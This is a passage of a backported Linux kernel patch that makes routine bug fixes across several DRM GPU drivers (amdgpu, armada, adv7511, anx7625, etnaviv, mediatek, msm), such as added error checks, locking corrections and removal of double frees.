++	 * If there is an error in processing command, bits[7:0] will be set.
++	 * This is applicable for PSP v13.0.6 and newer.
++	 */
+ 	for (retry_loop = 0; retry_loop < 10; retry_loop++) {
+-		/* Wait for bootloader to signify that is
+-		    ready having bit 31 of C2PMSG_35 set to 1 */
+-		ret = psp_wait_for(psp,
+-				   SOC15_REG_OFFSET(MP0, 0, regMP0_SMN_C2PMSG_35),
+-				   0x80000000,
+-				   0x80000000,
+-				   false);
++		ret = psp_wait_for(
++			psp, SOC15_REG_OFFSET(MP0, 0, regMP0_SMN_C2PMSG_35),
++			0x80000000, 0xffffffff, false);
+ 
+ 		if (ret == 0)
+ 			return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/si.c b/drivers/gpu/drm/amd/amdgpu/si.c
+index 7f99e130acd06..fd34c2100bd96 100644
+--- a/drivers/gpu/drm/amd/amdgpu/si.c
++++ b/drivers/gpu/drm/amd/amdgpu/si.c
+@@ -2276,17 +2276,8 @@ static void si_pcie_gen3_enable(struct amdgpu_device *adev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(adev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(adev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(adev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -2331,21 +2322,14 @@ static void si_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ 				mdelay(100);
+ 
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(adev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(adev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(adev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+ 							  &tmp16);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 249b269e2cc53..c8e562dcd99d0 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5921,8 +5921,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+-		recalculate_timing = amdgpu_freesync_vid_mode &&
+-				 is_freesync_video_mode(&mode, aconnector);
++		recalculate_timing = is_freesync_video_mode(&mode, aconnector);
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
+@@ -7016,7 +7015,7 @@ static void amdgpu_dm_connector_add_freesync_modes(struct drm_connector *connect
+ 	struct amdgpu_dm_connector *amdgpu_dm_connector =
+ 		to_amdgpu_dm_connector(connector);
+ 
+-	if (!(amdgpu_freesync_vid_mode && edid))
++	if (!edid)
+ 		return;
+ 
+ 	if (amdgpu_dm_connector->max_vfreq - amdgpu_dm_connector->min_vfreq > 10)
+@@ -7859,10 +7858,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		 * fast updates.
+ 		 */
+ 		if (crtc->state->async_flip &&
+-		    acrtc_state->update_type != UPDATE_TYPE_FAST)
++		    (acrtc_state->update_type != UPDATE_TYPE_FAST ||
++		     get_mem_type(old_plane_state->fb) != get_mem_type(fb)))
+ 			drm_warn_once(state->dev,
+ 				      "[PLANE:%d:%s] async flip with non-fast update\n",
+ 				      plane->base.id, plane->name);
++
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+ 			acrtc_state->update_type == UPDATE_TYPE_FAST &&
+@@ -9022,8 +9023,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		 * TODO: Refactor this function to allow this check to work
+ 		 * in all conditions.
+ 		 */
+-		if (amdgpu_freesync_vid_mode &&
+-		    dm_new_crtc_state->stream &&
++		if (dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state, old_crtc_state))
+ 			goto skip_modeset;
+ 
+@@ -9063,7 +9063,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		}
+ 
+ 		/* Now check if we should set freesync video mode */
+-		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
++		if (dm_new_crtc_state->stream &&
+ 		    dc_is_stream_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    dc_is_stream_scaling_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+@@ -9076,7 +9076,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+ 
+ 			goto skip_modeset;
+-		} else if (amdgpu_freesync_vid_mode && aconnector &&
++		} else if (aconnector &&
+ 			   is_freesync_video_mode(&new_crtc_state->mode,
+ 						  aconnector)) {
+ 			struct drm_display_mode *high_mode;
+@@ -9815,6 +9815,11 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 
+ 	/* Remove exiting planes if they are modified */
+ 	for_each_oldnew_plane_in_state_reverse(state, plane, old_plane_state, new_plane_state, i) {
++		if (old_plane_state->fb && new_plane_state->fb &&
++		    get_mem_type(old_plane_state->fb) !=
++		    get_mem_type(new_plane_state->fb))
++			lock_and_validation_needed = true;
++
+ 		ret = dm_update_plane_state(dc, state, plane,
+ 					    old_plane_state,
+ 					    new_plane_state,
+@@ -10066,9 +10071,20 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		struct dm_crtc_state *dm_new_crtc_state =
+ 			to_dm_crtc_state(new_crtc_state);
+ 
++		/*
++		 * Only allow async flips for fast updates that don't change
++		 * the FB pitch, the DCC state, rotation, etc.
++		 */
++		if (new_crtc_state->async_flip && lock_and_validation_needed) {
++			drm_dbg_atomic(crtc->dev,
++				       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
++				       crtc->base.id, crtc->name);
++			ret = -EINVAL;
++			goto fail;
++		}
++
+ 		dm_new_crtc_state->update_type = lock_and_validation_needed ?
+-							 UPDATE_TYPE_FULL :
+-							 UPDATE_TYPE_FAST;
++			UPDATE_TYPE_FULL : UPDATE_TYPE_FAST;
+ 	}
+ 
+ 	/* Must be success */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index b9b70f4562c72..1ec643a0d00d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -406,18 +406,6 @@ static int dm_crtc_helper_atomic_check(struct drm_crtc *crtc,
+ 		return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * Only allow async flips for fast updates that don't change the FB
+-	 * pitch, the DCC state, rotation, etc.
+-	 */
+-	if (crtc_state->async_flip &&
+-	    dm_crtc_state->update_type != UPDATE_TYPE_FAST) {
+-		drm_dbg_atomic(crtc->dev,
+-			       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
+-			       crtc->base.id, crtc->name);
+-		return -EINVAL;
+-	}
+-
+ 	/* In some use cases, like reset, no stream is attached */
+ 	if (!dm_crtc_state->stream)
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
+index 925d6e13620ec..1bbf85defd611 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
+@@ -32,6 +32,7 @@
+ 
+ #define MAX_INSTANCE                                        6
+ #define MAX_SEGMENT                                         6
++#define SMU_REGISTER_WRITE_RETRY_COUNT                      5
+ 
+ struct IP_BASE_INSTANCE
+ {
+@@ -134,6 +135,8 @@ static int dcn315_smu_send_msg_with_param(
+ 		unsigned int msg_id, unsigned int param)
+ {
+ 	uint32_t result;
++	uint32_t i = 0;
++	uint32_t read_back_data;
+ 
+ 	result = dcn315_smu_wait_for_response(clk_mgr, 10, 200000);
+ 
+@@ -150,10 +153,19 @@ static int dcn315_smu_send_msg_with_param(
+ 	/* Set the parameter register for the SMU message, unit is Mhz */
+ 	REG_WRITE(MP1_SMN_C2PMSG_37, param);
+ 
+-	/* Trigger the message transaction by writing the message ID */
+-	generic_write_indirect_reg(CTX,
+-		REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
+-		mmMP1_C2PMSG_3, msg_id);
++	for (i = 0; i < SMU_REGISTER_WRITE_RETRY_COUNT; i++) {
++		/* Trigger the message transaction by writing the message ID */
++		generic_write_indirect_reg(CTX,
++			REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
++			mmMP1_C2PMSG_3, msg_id);
++		read_back_data = generic_read_indirect_reg(CTX,
++			REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
++			mmMP1_C2PMSG_3);
++		if (read_back_data == msg_id)
++			break;
++		udelay(2);
++		smu_print("SMU msg id write fail %x times. \n", i + 1);
++	}
+ 
+ 	result = dcn315_smu_wait_for_response(clk_mgr, 10, 200000);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+index d260eaa1509ed..9378c98d02cfe 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+@@ -1813,10 +1813,13 @@ void dce110_enable_accelerated_mode(struct dc *dc, struct dc_state *context)
+ 			hws->funcs.edp_backlight_control(edp_link_with_sink, false);
+ 		}
+ 		/*resume from S3, no vbios posting, no need to power down again*/
++		clk_mgr_exit_optimized_pwr_state(dc, dc->clk_mgr);
++
+ 		power_down_all_hw_blocks(dc);
+ 		disable_vga_and_power_gate_all_controllers(dc);
+ 		if (edp_link_with_sink && !keep_edp_vdd_on)
+ 			dc->hwss.edp_power_control(edp_link_with_sink, false);
++		clk_mgr_optimize_pwr_state(dc, dc->clk_mgr);
+ 	}
+ 	bios_set_scratch_acc_mode_change(dc->ctx->dc_bios, 1);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
+index 6192851c59ed8..51265a812bdc8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
+@@ -75,6 +75,7 @@ static const struct hw_sequencer_funcs dcn301_funcs = {
+ 	.get_hw_state = dcn10_get_hw_state,
+ 	.clear_status_bits = dcn10_clear_status_bits,
+ 	.wait_for_mpcc_disconnect = dcn10_wait_for_mpcc_disconnect,
++	.edp_backlight_control = dce110_edp_backlight_control,
+ 	.edp_power_control = dce110_edp_power_control,
+ 	.edp_wait_for_hpd_ready = dce110_edp_wait_for_hpd_ready,
+ 	.set_cursor_position = dcn10_set_cursor_position,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index cef32a1f91cdc..b735e548e26dc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -84,7 +84,8 @@ static enum phyd32clk_clock_source get_phy_mux_symclk(
+ 		struct dcn_dccg *dccg_dcn,
+ 		enum phyd32clk_clock_source src)
+ {
+-	if (dccg_dcn->base.ctx->asic_id.hw_internal_rev == YELLOW_CARP_B0) {
++	if (dccg_dcn->base.ctx->asic_id.chip_family == FAMILY_YELLOW_CARP &&
++			dccg_dcn->base.ctx->asic_id.hw_internal_rev == YELLOW_CARP_B0) {
+ 		if (src == PHYD32CLKC)
+ 			src = PHYD32CLKF;
+ 		if (src == PHYD32CLKD)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 8a88605827a84..551a63f7064bb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -32,7 +32,7 @@
+ #include "dml/display_mode_vba.h"
+ 
+ struct _vcs_dpi_ip_params_st dcn3_14_ip = {
+-	.VBlankNomDefaultUS = 800,
++	.VBlankNomDefaultUS = 668,
+ 	.gpuvm_enable = 1,
+ 	.gpuvm_max_page_table_levels = 1,
+ 	.hostvm_enable = 1,
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 7d613118cb713..8472013ff38a2 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2072,15 +2072,19 @@ static int amdgpu_device_attr_create(struct amdgpu_device *adev,
+ 				     uint32_t mask, struct list_head *attr_list)
+ {
+ 	int ret = 0;
+-	struct device_attribute *dev_attr = &attr->dev_attr;
+-	const char *name = dev_attr->attr.name;
+ 	enum amdgpu_device_attr_states attr_states = ATTR_STATE_SUPPORTED;
+ 	struct amdgpu_device_attr_entry *attr_entry;
++	struct device_attribute *dev_attr;
++	const char *name;
+ 
+ 	int (*attr_update)(struct amdgpu_device *adev, struct amdgpu_device_attr *attr,
+ 			   uint32_t mask, enum amdgpu_device_attr_states *states) = default_attr_update;
+ 
+-	BUG_ON(!attr);
++	if (!attr)
++		return -EINVAL;
++
++	dev_attr = &attr->dev_attr;
++	name = dev_attr->attr.name;
+ 
+ 	attr_update = attr->attr_update ? attr->attr_update : default_attr_update;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index f7ac488a3da20..503e844baede2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1305,7 +1305,7 @@ static ssize_t smu_v13_0_0_get_gpu_metrics(struct smu_context *smu,
+ 	gpu_metrics->average_vclk1_frequency = metrics->AverageVclk1Frequency;
+ 	gpu_metrics->average_dclk1_frequency = metrics->AverageDclk1Frequency;
+ 
+-	gpu_metrics->current_gfxclk = metrics->CurrClock[PPCLK_GFXCLK];
++	gpu_metrics->current_gfxclk = gpu_metrics->average_gfxclk_frequency;
+ 	gpu_metrics->current_socclk = metrics->CurrClock[PPCLK_SOCCLK];
+ 	gpu_metrics->current_uclk = metrics->CurrClock[PPCLK_UCLK];
+ 	gpu_metrics->current_vclk0 = metrics->CurrClock[PPCLK_VCLK_0];
+diff --git a/drivers/gpu/drm/armada/armada_overlay.c b/drivers/gpu/drm/armada/armada_overlay.c
+index f21eb8fb76d87..3b9bd8ecda137 100644
+--- a/drivers/gpu/drm/armada/armada_overlay.c
++++ b/drivers/gpu/drm/armada/armada_overlay.c
+@@ -4,6 +4,8 @@
+  *  Rewritten from the dovefb driver, and Armada510 manuals.
+  */
+ 
++#include <linux/bitfield.h>
++
+ #include <drm/armada_drm.h>
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -445,8 +447,8 @@ static int armada_overlay_get_property(struct drm_plane *plane,
+ 			     drm_to_overlay_state(state)->colorkey_ug,
+ 			     drm_to_overlay_state(state)->colorkey_vb, 0);
+ 	} else if (property == priv->colorkey_mode_prop) {
+-		*val = (drm_to_overlay_state(state)->colorkey_mode &
+-			CFG_CKMODE_MASK) >> ffs(CFG_CKMODE_MASK);
++		*val = FIELD_GET(CFG_CKMODE_MASK,
++				 drm_to_overlay_state(state)->colorkey_mode);
+ 	} else if (property == priv->brightness_prop) {
+ 		*val = drm_to_overlay_state(state)->brightness + 256;
+ 	} else if (property == priv->contrast_prop) {
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+index 78b72739e5c3e..9f9874acfb2b7 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+@@ -786,8 +786,13 @@ static void adv7511_mode_set(struct adv7511 *adv7511,
+ 	else
+ 		low_refresh_rate = ADV7511_LOW_REFRESH_RATE_NONE;
+ 
+-	regmap_update_bits(adv7511->regmap, 0xfb,
+-		0x6, low_refresh_rate << 1);
++	if (adv7511->type == ADV7511)
++		regmap_update_bits(adv7511->regmap, 0xfb,
++				   0x6, low_refresh_rate << 1);
++	else
++		regmap_update_bits(adv7511->regmap, 0x4a,
++				   0xc, low_refresh_rate << 2);
++
+ 	regmap_update_bits(adv7511->regmap, 0x17,
+ 		0x60, (vsync_polarity << 6) | (hsync_polarity << 5));
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 213263ad6a064..cf86cc05b7fca 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -874,11 +874,11 @@ static int anx7625_hdcp_enable(struct anx7625_data *ctx)
+ 	}
+ 
+ 	/* Read downstream capability */
+-	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_READ, 0x68028, 1, &bcap);
++	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_READ, DP_AUX_HDCP_BCAPS, 1, &bcap);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (!(bcap & 0x01)) {
++	if (!(bcap & DP_BCAPS_HDCP_CAPABLE)) {
+ 		pr_warn("downstream not support HDCP 1.4, cap(%x).\n", bcap);
+ 		return 0;
+ 	}
+@@ -933,8 +933,8 @@ static void anx7625_dp_start(struct anx7625_data *ctx)
+ 
+ 	dev_dbg(dev, "set downstream sink into normal\n");
+ 	/* Downstream sink enter into normal mode */
+-	data = 1;
+-	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, 0x000600, 1, &data);
++	data = DP_SET_POWER_D0;
++	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, DP_SET_POWER, 1, &data);
+ 	if (ret < 0)
+ 		dev_err(dev, "IO error : set sink into normal mode fail\n");
+ 
+@@ -973,8 +973,8 @@ static void anx7625_dp_stop(struct anx7625_data *ctx)
+ 
+ 	dev_dbg(dev, "notify downstream enter into standby\n");
+ 	/* Downstream monitor enter into standby mode */
+-	data = 2;
+-	ret |= anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, 0x000600, 1, &data);
++	data = DP_SET_POWER_D3;
++	ret |= anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, DP_SET_POWER, 1, &data);
+ 	if (ret < 0)
+ 		DRM_DEV_ERROR(dev, "IO error : mute video fail\n");
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358764.c b/drivers/gpu/drm/bridge/tc358764.c
+index 53259c12d7778..e0f583a88789d 100644
+--- a/drivers/gpu/drm/bridge/tc358764.c
++++ b/drivers/gpu/drm/bridge/tc358764.c
+@@ -176,7 +176,7 @@ static void tc358764_read(struct tc358764 *ctx, u16 addr, u32 *val)
+ 	if (ret >= 0)
+ 		le32_to_cpus(val);
+ 
+-	dev_dbg(ctx->dev, "read: %d, addr: %d\n", addr, *val);
++	dev_dbg(ctx->dev, "read: addr=0x%04x data=0x%08x\n", addr, *val);
+ }
+ 
+ static void tc358764_write(struct tc358764 *ctx, u16 addr, u32 val)
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_dump.c b/drivers/gpu/drm/etnaviv/etnaviv_dump.c
+index f418e0b75772e..0edcf8ceb4a78 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_dump.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_dump.c
+@@ -125,9 +125,9 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 		return;
+ 	etnaviv_dump_core = false;
+ 
+-	mutex_lock(&gpu->mmu_context->lock);
++	mutex_lock(&submit->mmu_context->lock);
+ 
+-	mmu_size = etnaviv_iommu_dump_size(gpu->mmu_context);
++	mmu_size = etnaviv_iommu_dump_size(submit->mmu_context);
+ 
+ 	/* We always dump registers, mmu, ring, hanging cmdbuf and end marker */
+ 	n_obj = 5;
+@@ -157,7 +157,7 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 	iter.start = __vmalloc(file_size, GFP_KERNEL | __GFP_NOWARN |
+ 			__GFP_NORETRY);
+ 	if (!iter.start) {
+-		mutex_unlock(&gpu->mmu_context->lock);
++		mutex_unlock(&submit->mmu_context->lock);
+ 		dev_warn(gpu->dev, "failed to allocate devcoredump file\n");
+ 		return;
+ 	}
+@@ -169,18 +169,18 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 	memset(iter.hdr, 0, iter.data - iter.start);
+ 
+ 	etnaviv_core_dump_registers(&iter, gpu);
+-	etnaviv_core_dump_mmu(&iter, gpu->mmu_context, mmu_size);
++	etnaviv_core_dump_mmu(&iter, submit->mmu_context, mmu_size);
+ 	etnaviv_core_dump_mem(&iter, ETDUMP_BUF_RING, gpu->buffer.vaddr,
+ 			      gpu->buffer.size,
+ 			      etnaviv_cmdbuf_get_va(&gpu->buffer,
+-					&gpu->mmu_context->cmdbuf_mapping));
++					&submit->mmu_context->cmdbuf_mapping));
+ 
+ 	etnaviv_core_dump_mem(&iter, ETDUMP_BUF_CMD,
+ 			      submit->cmdbuf.vaddr, submit->cmdbuf.size,
+ 			      etnaviv_cmdbuf_get_va(&submit->cmdbuf,
+-					&gpu->mmu_context->cmdbuf_mapping));
++					&submit->mmu_context->cmdbuf_mapping));
+ 
+-	mutex_unlock(&gpu->mmu_context->lock);
++	mutex_unlock(&submit->mmu_context->lock);
+ 
+ 	/* Reserve space for the bomap */
+ 	if (n_bomap_pages) {
+diff --git a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+index 29ee0814bccc8..68050409dd26c 100644
+--- a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
++++ b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+@@ -7,6 +7,7 @@
+ #include <linux/hyperv.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
++#include <linux/screen_info.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 007af69e5026f..4c249939a6c3b 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -1588,7 +1588,9 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 	u8 val;
+ 	ssize_t ret;
+ 
+-	drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
++	ret = drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
++	if (ret < 0)
++		return ret;
+ 
+ 	if (drm_dp_tps4_supported(mtk_dp->rx_cap))
+ 		mtk_dp->train_info.channel_eq_pattern = DP_TRAINING_PATTERN_4;
+@@ -1615,10 +1617,13 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 			return ret == 0 ? -EIO : ret;
+ 		}
+ 
+-		if (val)
+-			drm_dp_dpcd_writeb(&mtk_dp->aux,
+-					   DP_DEVICE_SERVICE_IRQ_VECTOR_ESI0,
+-					   val);
++		if (val) {
++			ret = drm_dp_dpcd_writeb(&mtk_dp->aux,
++						 DP_DEVICE_SERVICE_IRQ_VECTOR_ESI0,
++						 val);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 5071f1263216b..14ddfe3a6be77 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -115,10 +115,9 @@ static int mtk_drm_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *
+ 	dma_addr_t dma_addr;
+ 
+ 	pkt->va_base = kzalloc(size, GFP_KERNEL);
+-	if (!pkt->va_base) {
+-		kfree(pkt);
++	if (!pkt->va_base)
+ 		return -ENOMEM;
+-	}
++
+ 	pkt->buf_size = size;
+ 	pkt->cl = (void *)client;
+ 
+@@ -128,7 +127,6 @@ static int mtk_drm_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *
+ 	if (dma_mapping_error(dev, dma_addr)) {
+ 		dev_err(dev, "dma map failed, size=%u\n", (u32)(u64)size);
+ 		kfree(pkt->va_base);
+-		kfree(pkt);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -144,7 +142,6 @@ static void mtk_drm_cmdq_pkt_destroy(struct cmdq_pkt *pkt)
+ 	dma_unmap_single(client->chan->mbox->dev, pkt->pa_base, pkt->buf_size,
+ 			 DMA_TO_DEVICE);
+ 	kfree(pkt->va_base);
+-	kfree(pkt);
+ }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 6c204ccfb9ece..1d0374a577a5e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -242,7 +242,11 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 
+ 	mtk_gem->kvaddr = vmap(mtk_gem->pages, npages, VM_MAP,
+ 			       pgprot_writecombine(PAGE_KERNEL));
+-
++	if (!mtk_gem->kvaddr) {
++		kfree(sgt);
++		kfree(mtk_gem->pages);
++		return -ENOMEM;
++	}
+ out:
+ 	kfree(sgt);
+ 	iosys_map_set_vaddr(map, mtk_gem->kvaddr);
+diff --git a/drivers/gpu/drm/msm/adreno/a2xx_gpu.c b/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
+index 6c9a747eb4ad5..2428d6ac5fe96 100644
+--- a/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
+@@ -521,6 +521,10 @@ struct msm_gpu *a2xx_gpu_init(struct drm_device *dev)
+ 	gpu->perfcntrs = perfcntrs;
+ 	gpu->num_perfcntrs = ARRAY_SIZE(perfcntrs);
+ 
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 1);
++	if (ret)
++		goto fail;
++
+ 	if (adreno_is_a20x(adreno_gpu))
+ 		adreno_gpu->registers = a200_registers;
+ 	else if (adreno_is_a225(adreno_gpu))
+@@ -528,10 +532,6 @@ struct msm_gpu *a2xx_gpu_init(struct drm_device *dev)
+ 	else
+ 		adreno_gpu->registers = a220_registers;
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 1);
+-	if (ret)
+-		goto fail;
+-
+ 	if (!gpu->aspace) {
+ 		dev_err(dev->dev, "No memory protection without MMU\n");
+ 		if (!allow_vram_carveout) {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 62f6ff6abf410..42c7e378d504d 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
